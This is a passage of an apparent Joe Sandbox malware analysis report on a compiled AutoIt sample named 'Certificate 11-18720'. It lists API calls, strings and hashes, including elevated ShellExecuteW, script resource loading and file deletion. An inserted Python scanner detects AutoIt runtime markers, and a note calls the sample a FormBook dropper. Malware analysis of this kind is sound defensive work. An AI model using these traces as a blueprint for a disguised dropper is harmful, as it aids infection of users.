                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,005C3AA3,?), ref: 005C3E48
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006728F4,00000010), ref: 00631CCE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00681148,?,?,?,?,?,005C3AA3,?), ref: 00631D06
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0065DAB4,00681148,?,?,?,?,?,005C3AA3,?), ref: 00631D89
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,005C3AA3), ref: 00631D90
                                                                                      • Part of subcall function 005C3E6E: GetSysColorBrush.USER32(0000000F), ref: 005C3E79
                                                                                      • Part of subcall function 005C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 005C3E88
                                                                                      • Part of subcall function 005C3E6E: LoadIconW.USER32(00000063), ref: 005C3E9E
                                                                                      • Part of subcall function 005C3E6E: LoadIconW.USER32(000000A4), ref: 005C3EB0
                                                                                      • Part of subcall function 005C3E6E: LoadIconW.USER32(000000A2), ref: 005C3EC2
                                                                                      • Part of subcall function 005C3E6E: RegisterClassExW.USER32(?), ref: 005C3F30
                                                                                      • Part of subcall function 005C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C36E6
                                                                                      • Part of subcall function 005C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C3707
                                                                                      • Part of subcall function 005C36B8: ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C371B
                                                                                      • Part of subcall function 005C36B8: ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C3724
                                                                                      • Part of subcall function 005C4FFC: _memset.LIBCMT ref: 005C5022
                                                                                      • Part of subcall function 005C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C50CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                    • String ID: ()g$This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 438480954-2924012712
                                                                                    • Opcode ID: 1e51c79abead282f97953a5c738d7cc54b7fa6ab1e199631d885522b7b5d75cf
                                                                                    • Instruction ID: 8b7a3d29f54d6711535ccbec9867663424e9a7e144952496c2251fc3318af69c
                                                                                    • Opcode Fuzzy Hash: 1e51c79abead282f97953a5c738d7cc54b7fa6ab1e199631d885522b7b5d75cf
                                                                                    • Instruction Fuzzy Hash: 8851E330A0424ABECB11ABF0DC59FEE7F7FBB46704F00916DF2416A192DA645646CB21

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 005DDDEC
                                                                                    • GetCurrentProcess.KERNEL32(00000000,0065DC38,?,?), ref: 005DDEAC
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,0065DC38,?,?), ref: 005DDF01
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 005DDF0C
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 005DDF1F
                                                                                    • GetSystemInfo.KERNEL32(?,0065DC38,?,?), ref: 005DDF29
                                                                                    • GetSystemInfo.KERNEL32(?,0065DC38,?,?), ref: 005DDF35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                    • String ID:
                                                                                    • API String ID: 3851250370-0
                                                                                    • Opcode ID: d1225d6d56d5fb3f268a941af432883e1da897798556a3a277f24ef8eeac532d
                                                                                    • Instruction ID: 4bda46c1b72e85e247da845c8375ce42b44f540fe538564988c239a5de8977dd
                                                                                    • Opcode Fuzzy Hash: d1225d6d56d5fb3f268a941af432883e1da897798556a3a277f24ef8eeac532d
                                                                                    • Instruction Fuzzy Hash: 6561AEB180A285CBCF25CF68D8C15E97FB5BF2A300F1989DAD8459F307C624C949CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005C449E,?,?,00000000,00000001), ref: 005C407B
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005C449E,?,?,00000000,00000001), ref: 005C4092
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,005C449E,?,?,00000000,00000001,?,?,?,?,?,?,005C41FB), ref: 00634F1A
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,005C449E,?,?,00000000,00000001,?,?,?,?,?,?,005C41FB), ref: 00634F2F
                                                                                    • LockResource.KERNEL32(005C449E,?,?,005C449E,?,?,00000000,00000001,?,?,?,?,?,?,005C41FB,00000000), ref: 00634F42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: 994703e7fc080d04bdb79207a2db2f4cc7951e892d85532dd8f35bd1e108257f
                                                                                    • Instruction ID: e1cca5adb18c2fcacfae2f5a0a284db1f97a5cd7c634e25fd894d35c0d3f4933
                                                                                    • Opcode Fuzzy Hash: 994703e7fc080d04bdb79207a2db2f4cc7951e892d85532dd8f35bd1e108257f
                                                                                    • Instruction Fuzzy Hash: A2118E74640701BFE7218B65EC48F677BBAFBC6B51F10412CF6029A2A0DBB1DC00CA20
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID: @$ h$ h$ h
                                                                                    • API String ID: 3728558374-1248899527
                                                                                    • Opcode ID: 32892553f0a22f19b59a1c8e078661eca451ea2adc65a73f6f01d15bb9ee66ab
                                                                                    • Instruction ID: e0cd227443250787e38023bb9c9359c0c5d6894bbf29b5d2fa40443a315a406c
                                                                                    • Opcode Fuzzy Hash: 32892553f0a22f19b59a1c8e078661eca451ea2adc65a73f6f01d15bb9ee66ab
                                                                                    • Instruction Fuzzy Hash: BC72A074D0420A9FDF24DF98C485AAEBBB6FF48300F14805BE905AB391D775AE45CB92
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00632F49), ref: 00606CB9
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00606CCA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00606CDA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 441376e8c35d783891147436009cf01629941bb0b2fde610d18158ec8f9f3db9
                                                                                    • Instruction ID: b951749c9758d4dc734da9a8f1c3163891e2eac1f2b17d9d7784f00a97b3d6d7
                                                                                    • Opcode Fuzzy Hash: 441376e8c35d783891147436009cf01629941bb0b2fde610d18158ec8f9f3db9
                                                                                    • Instruction Fuzzy Hash: F6E0D835C1041057D3186738EC0D4EA37AEDA06339F100709F971C22D0E770D91045D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: h
                                                                                    • API String ID: 3964851224-853301588
                                                                                    • Opcode ID: b61484ae28ce4e9d67c57157f26a10714df29992a4963c75769b6564c57b59f9
                                                                                    • Instruction ID: d5c39f3c1324a88706c661a58b0100ea312c25d8715ad161e3438e8b30f23e49
                                                                                    • Opcode Fuzzy Hash: b61484ae28ce4e9d67c57157f26a10714df29992a4963c75769b6564c57b59f9
                                                                                    • Instruction Fuzzy Hash: AA925A706083419FD724DF18C484B6ABBE1FF88304F14896EE99A8B362D771ED45CB92
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005CE959
                                                                                    • timeGetTime.WINMM ref: 005CEBFA
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005CED2E
                                                                                    • TranslateMessage.USER32(?), ref: 005CED3F
                                                                                    • DispatchMessageW.USER32(?), ref: 005CED4A
                                                                                    • LockWindowUpdate.USER32(00000000), ref: 005CED79
                                                                                    • DestroyWindow.USER32 ref: 005CED85
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005CED9F
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00635270
                                                                                    • TranslateMessage.USER32(?), ref: 006359F7
                                                                                    • DispatchMessageW.USER32(?), ref: 00635A05
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00635A19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                     • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 2641332412-570651680
                                                                                    • Opcode ID: 6d331953b344bc1c6502b4aeb4dabacee554fda3a51582617a368b7ee31a77f5
                                                                                    • Instruction ID: 88f3be15405b6b4b1cc37bdddb2ef1997ac3cc2514e94bdf178805af8095209e
                                                                                    • Opcode Fuzzy Hash: 6d331953b344bc1c6502b4aeb4dabacee554fda3a51582617a368b7ee31a77f5
                                                                                    • Instruction Fuzzy Hash: 6562B270504341DFDB24DF64C88AFAA7BE6BF85304F14496EF9868B292DB71D844CB92
                                                                                    APIs
                                                                                    • ___createFile.LIBCMT ref: 005F5EC3
                                                                                    • ___createFile.LIBCMT ref: 005F5F04
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 005F5F2D
                                                                                    • __dosmaperr.LIBCMT ref: 005F5F34
                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 005F5F47
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 005F5F6A
                                                                                    • __dosmaperr.LIBCMT ref: 005F5F73
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 005F5F7C
                                                                                    • __set_osfhnd.LIBCMT ref: 005F5FAC
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F6016
                                                                                    • __close_nolock.LIBCMT ref: 005F603C
                                                                                    • __chsize_nolock.LIBCMT ref: 005F606C
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F607E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F6176
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F618B
                                                                                    • __close_nolock.LIBCMT ref: 005F61EB
                                                                                      • Part of subcall function 005EEA9C: CloseHandle.KERNELBASE(00000000,0066EEF4,00000000,?,005F6041,0066EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005EEAEC
                                                                                      • Part of subcall function 005EEA9C: GetLastError.KERNEL32(?,005F6041,0066EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005EEAF6
                                                                                      • Part of subcall function 005EEA9C: __free_osfhnd.LIBCMT ref: 005EEB03
                                                                                      • Part of subcall function 005EEA9C: __dosmaperr.LIBCMT ref: 005EEB25
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F620D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 005F6342
                                                                                    • ___createFile.LIBCMT ref: 005F6361
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005F636E
                                                                                    • __dosmaperr.LIBCMT ref: 005F6375
                                                                                    • __free_osfhnd.LIBCMT ref: 005F6395
                                                                                    • __invoke_watson.LIBCMT ref: 005F63C3
                                                                                    • __wsopen_helper.LIBCMT ref: 005F63DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                     • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                    • String ID: @
                                                                                    • API String ID: 3896587723-2766056989
                                                                                    • Opcode ID: 01fd1cfbb8215dc8fc2d4f196c0cad09a9d4c788d5e279ac67bec9e937b3610b
                                                                                    • Instruction ID: 0c3deff3f4b643cc57a32171ac929ca546785e6c076f1ced33e908c1e67541fe
                                                                                    • Opcode Fuzzy Hash: 01fd1cfbb8215dc8fc2d4f196c0cad09a9d4c788d5e279ac67bec9e937b3610b
                                                                                    • Instruction Fuzzy Hash: 2D22337190060EAFEB299F68CC49BBD7F65FB41310F244668E7619B2E1D63D8E40C791

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _wcscpy.LIBCMT ref: 0060FA96
                                                                                    • _wcschr.LIBCMT ref: 0060FAA4
                                                                                    • _wcscpy.LIBCMT ref: 0060FABB
                                                                                    • _wcscat.LIBCMT ref: 0060FACA
                                                                                    • _wcscat.LIBCMT ref: 0060FAE8
                                                                                    • _wcscpy.LIBCMT ref: 0060FB09
                                                                                    • __wsplitpath.LIBCMT ref: 0060FBE6
                                                                                    • _wcscpy.LIBCMT ref: 0060FC0B
                                                                                    • _wcscpy.LIBCMT ref: 0060FC1D
                                                                                    • _wcscpy.LIBCMT ref: 0060FC32
                                                                                    • _wcscat.LIBCMT ref: 0060FC47
                                                                                    • _wcscat.LIBCMT ref: 0060FC59
                                                                                    • _wcscat.LIBCMT ref: 0060FC6E
                                                                                      • Part of subcall function 0060BFA4: _wcscmp.LIBCMT ref: 0060C03E
                                                                                      • Part of subcall function 0060BFA4: __wsplitpath.LIBCMT ref: 0060C083
                                                                                      • Part of subcall function 0060BFA4: _wcscpy.LIBCMT ref: 0060C096
                                                                                      • Part of subcall function 0060BFA4: _wcscat.LIBCMT ref: 0060C0A9
                                                                                      • Part of subcall function 0060BFA4: __wsplitpath.LIBCMT ref: 0060C0CE
                                                                                      • Part of subcall function 0060BFA4: _wcscat.LIBCMT ref: 0060C0E4
                                                                                      • Part of subcall function 0060BFA4: _wcscat.LIBCMT ref: 0060C0F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                     • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$t2g
                                                                                    • API String ID: 2955681530-1606328850
                                                                                    • Opcode ID: 9736e5e9321007058756d4b246f9e165d26f97980ef5011d2c4a50e49d30a614
                                                                                    • Instruction ID: e077aeb1c7203293d62ef4472340c56c2d9670034864ca711a3e6a300c896524
                                                                                    • Opcode Fuzzy Hash: 9736e5e9321007058756d4b246f9e165d26f97980ef5011d2c4a50e49d30a614
                                                                                    • Instruction Fuzzy Hash: 7291AF72504246AFDB24EB54C859F9BB7E9BF84300F04482DF98997292DB70EA44CB92

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 005C3F86
                                                                                    • RegisterClassExW.USER32(00000030), ref: 005C3FB0
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C3FC1
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 005C3FDE
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005C3FEE
                                                                                    • LoadIconW.USER32(000000A9), ref: 005C4004
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005C4013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                     • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: fe089a2f18cb4d875ab5e8d820e593af45b7f5fb78e34a79255a0a8eeda337d1
                                                                                    • Instruction ID: 3e96916236e724f066ae0dd444d73786ded39600ef47df5004195cfcfdb42928
                                                                                    • Opcode Fuzzy Hash: fe089a2f18cb4d875ab5e8d820e593af45b7f5fb78e34a79255a0a8eeda337d1
                                                                                    • Instruction Fuzzy Hash: 1E21E5B5D00218AFDB00DFA4EC89BCDBFBAFB0A700F10521AF511AA2A0D7B505858F90
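The two listings above, the path-building function with refs 0060FA96-0060FC6E that carries the string ">>>AUTOIT SCRIPT<<<" and the window-class registration at 005C3F53 that names the class "AutoIt v3 GUI", show the strings the AutoIt runtime stub leaves in a compiled script. The following is an added example, not code from the report or from the sample, that checks a file for those markers. It assumes the strings are stored as UTF-16LE (the runtime reaches them through wide-char APIs such as _wcscpy and RegisterClassExW) and tries the ASCII form as well; the two sample byte blobs are constructed here for the test, and "TaskbarCreated" is kept as context only, since any tray-icon program registers that message.

```python
"""Flag a binary that carries the AutoIt runtime markers seen in the report.

Added example: not code from the report or from the sample. The byte
patterns are assumed from the String IDs in the listings above.
"""

import sys

# Markers specific to the AutoIt runtime stub (from the String IDs above).
AUTOIT_MARKERS = {
    "script_marker": ">>>AUTOIT SCRIPT<<<",
    "gui_class": "AutoIt v3 GUI",
}
# Registered by every tray-icon application: recorded, never counted.
CONTEXT_MARKERS = {"taskbar_msg": "TaskbarCreated"}


def _encodings(text):
    """Both byte forms we search for; UTF-16LE is the assumed primary one."""
    return {"ascii": text.encode("ascii"), "utf-16le": text.encode("utf-16-le")}


def find_markers(data):
    """Return {marker_name: [(encoding, offset), ...]} for every hit in data."""
    hits = {}
    for name, text in {**AUTOIT_MARKERS, **CONTEXT_MARKERS}.items():
        for enc, needle in _encodings(text).items():
            start = 0
            while True:
                off = data.find(needle, start)
                if off < 0:
                    break
                hits.setdefault(name, []).append((enc, off))
                start = off + 1
    return hits


def looks_like_autoit(data):
    """True only when every AutoIt-specific marker is present."""
    hits = find_markers(data)
    return all(name in hits for name in AUTOIT_MARKERS)


def scan_file(path):
    """Read a file from disk and report its marker hits."""
    with open(path, "rb") as fh:
        return find_markers(fh.read())


# Constructed stand-in for a compiled-AutoIt image: MZ header, padding, markers.
SAMPLE_AUTOIT = (
    b"MZ\x90\x00" + b"\x00" * 32
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") + b"\x00" * 8
    + "AutoIt v3 GUI".encode("utf-16-le") + b"\x00" * 8
    + "TaskbarCreated".encode("utf-16-le")
)
# Constructed stand-in for an ordinary tray application: must not match.
SAMPLE_TRAY_APP = b"MZ\x90\x00" + b"\x00" * 32 + "TaskbarCreated".encode("utf-16-le")


if __name__ == "__main__":
    for path in sys.argv[1:]:
        hits = scan_file(path)
        verdict = "AutoIt stub" if all(n in hits for n in AUTOIT_MARKERS) else "no match"
        print(f"{path}: {verdict} {hits}")
```

The markers live in the AutoIt runtime stub, so a hit says how the sample is packaged, not what the embedded script does; a benign compiled AutoIt tool matches just as this FormBook dropper does. The report's listings come from a process memory dump (the .sdmp sources above), so a match there does not by itself prove the on-disk file is unencrypted; run the scanner on the file you actually received and treat a hit as a reason to extract the script, not as a verdict on it.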

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0060BDB4: __time64.LIBCMT ref: 0060BDBE
                                                                                      • Part of subcall function 005C4517: _fseek.LIBCMT ref: 005C452F
                                                                                    • __wsplitpath.LIBCMT ref: 0060C083
                                                                                      • Part of subcall function 005E1DFC: __wsplitpath_helper.LIBCMT ref: 005E1E3C
                                                                                    • _wcscpy.LIBCMT ref: 0060C096
                                                                                    • _wcscat.LIBCMT ref: 0060C0A9
                                                                                    • __wsplitpath.LIBCMT ref: 0060C0CE
                                                                                    • _wcscat.LIBCMT ref: 0060C0E4
                                                                                    • _wcscat.LIBCMT ref: 0060C0F7
                                                                                    • _wcscmp.LIBCMT ref: 0060C03E
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C65D
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C670
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0060C2A1
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0060C338
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0060C34E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0060C35F
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0060C371
                                                                                    Memory Dump Source
                                                                                     • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
